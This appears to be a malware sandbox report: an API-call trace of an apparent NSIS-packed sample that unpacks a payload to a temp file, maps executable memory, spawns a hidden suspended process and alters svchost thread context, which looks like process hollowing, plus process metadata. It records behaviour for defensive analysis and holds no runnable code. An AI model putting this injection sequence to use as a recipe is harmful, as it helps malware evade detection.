File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x762a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemInfo, address_out = 0x762ba1f0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x76960000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintf, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7698ea00	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, type = file_attributes	2	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ	1	Fn
System	Get Time	type = Ticks, time = 36046	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
System	Get Time	type = Ticks, time = 36046	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 25540	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 4, size_out = 4	1	Fn Data
System	Get Time	type = Ticks, time = 36046	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
System	Get Time	type = Ticks, time = 36046	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 16141	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
System	Get Time	type = Ticks, time = 36062	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 16153	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
System	Get Time	type = Ticks, time = 36062	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 16149	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
System	Get Time	type = Ticks, time = 36062	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 24930	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 16384, size_out = 16384	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 16384	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 16384, size_out = 16384	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 16384	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 16384, size_out = 16384	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 16384	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 16384, size_out = 16384	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 16384	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsm8BD5.tmp, size = 6023, size_out = 6023	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 6023	1	Fn Data
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x762a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateFile, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x762c6170	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, desired_access = GENERIC_READ	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x76960000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintf, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7698ea00	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77090000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateSection, address_out = 0x770f9080	1	Fn
Module	Create Mapping	protection = PAGE_EXECUTE_READWRITE, maximum_size = 5750408	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x76960000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintf, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7698ea00	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77090000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ntdll.dll, function = NtMapViewOfSection, address_out = 0x770f8e60	1	Fn
Module	Map	process_name = c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x530000	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x762a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x762c64a0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = ReadFileA, address_out = 0x0	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 71559, size_out = 71559	1	Fn Data
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x762a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x762c5f20	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Int64Op, address_out = 0x1000180d	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Int64Op, address_out = 0x1000180d	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x76960000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintf, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7698ea00	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nss8bf6.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x76c50000	2	Fn
Module	Get Filename	module_name = C:\Users\CIIHMN~1\AppData\Local\Temp\nss8BF6.tmp\System.dll, process_name = c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 259	1	Fn
Process	Create	process_name = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, os_pid = 0xd94, creation_flags = CREATE_SUSPENDED, CREATE_NO_WINDOW, show_window = SW_HIDE	1	Fn
Thread	Get Context	process_name = c:\windows\system32\svchost.exe, os_tid = 0xd44	1	Fn
Memory	Read	process_name = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, address = 0x7ffde008, size = 4	1	Fn Data
Module	Load	module_name = advapi32.dll, base_address = 0x76c50000	2	Fn
File	Create	filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
File	Get Info	filename = C:\Windows\SYSTEM32\ntdll.dll, type = size	1	Fn
File	Read	filename = C:\Windows\SYSTEM32\ntdll.dll, size = 1533496, size_out = 1533496	1	Fn
Module	Unmap	-	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x76c50000	2	Fn
File	Create	filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
File	Get Info	filename = C:\Windows\SYSTEM32\ntdll.dll, type = size	1	Fn
File	Read	filename = C:\Windows\SYSTEM32\ntdll.dll, size = 1533496, size_out = 1533496	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x76c50000	2	Fn
File	Create	filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
File	Get Info	filename = C:\Windows\SYSTEM32\ntdll.dll, type = size	1	Fn
File	Read	filename = C:\Windows\SYSTEM32\ntdll.dll, size = 1533496, size_out = 1533496	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x76c50000	2	Fn
File	Create	filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
File	Get Info	filename = C:\Windows\SYSTEM32\ntdll.dll, type = size	1	Fn
File	Read	filename = C:\Windows\SYSTEM32\ntdll.dll, size = 1533496, size_out = 1533496	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x76c50000	2	Fn
File	Create	filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
File	Get Info	filename = C:\Windows\SYSTEM32\ntdll.dll, type = size	1	Fn
File	Read	filename = C:\Windows\SYSTEM32\ntdll.dll, size = 1533496, size_out = 1533496	1	Fn
Thread	Set Context	process_name = c:\windows\system32\svchost.exe, os_tid = 0xd44	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x76c50000	2	Fn
File	Create	filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
File	Get Info	filename = C:\Windows\SYSTEM32\ntdll.dll, type = size	1	Fn
File	Read	filename = C:\Windows\SYSTEM32\ntdll.dll, size = 1533496, size_out = 1533496	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x76c50000	2	Fn
File	Create	filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
File	Get Info	filename = C:\Windows\SYSTEM32\ntdll.dll, type = size	1	Fn
File	Read	filename = C:\Windows\SYSTEM32\ntdll.dll, size = 1533496, size_out = 1533496	1	Fn
Module	Unmap	-	1	Fn

Process #12: vworbzlbc.exe

(Host: 24125, Network: 0)

Information	Value
ID	#12
File Name	c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe
Command Line	"C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe"
Initial Working Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\
Monitor	Start Time: 00:01:56, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:03:27

OS Process Information

Information	Value
PID	0xd94
Parent PID	0xd40 (c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000149ea (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x D98 0x D9C 0x DA0 0x E3C 0x E48 0x E54 0x E60 0x E64

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00023fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
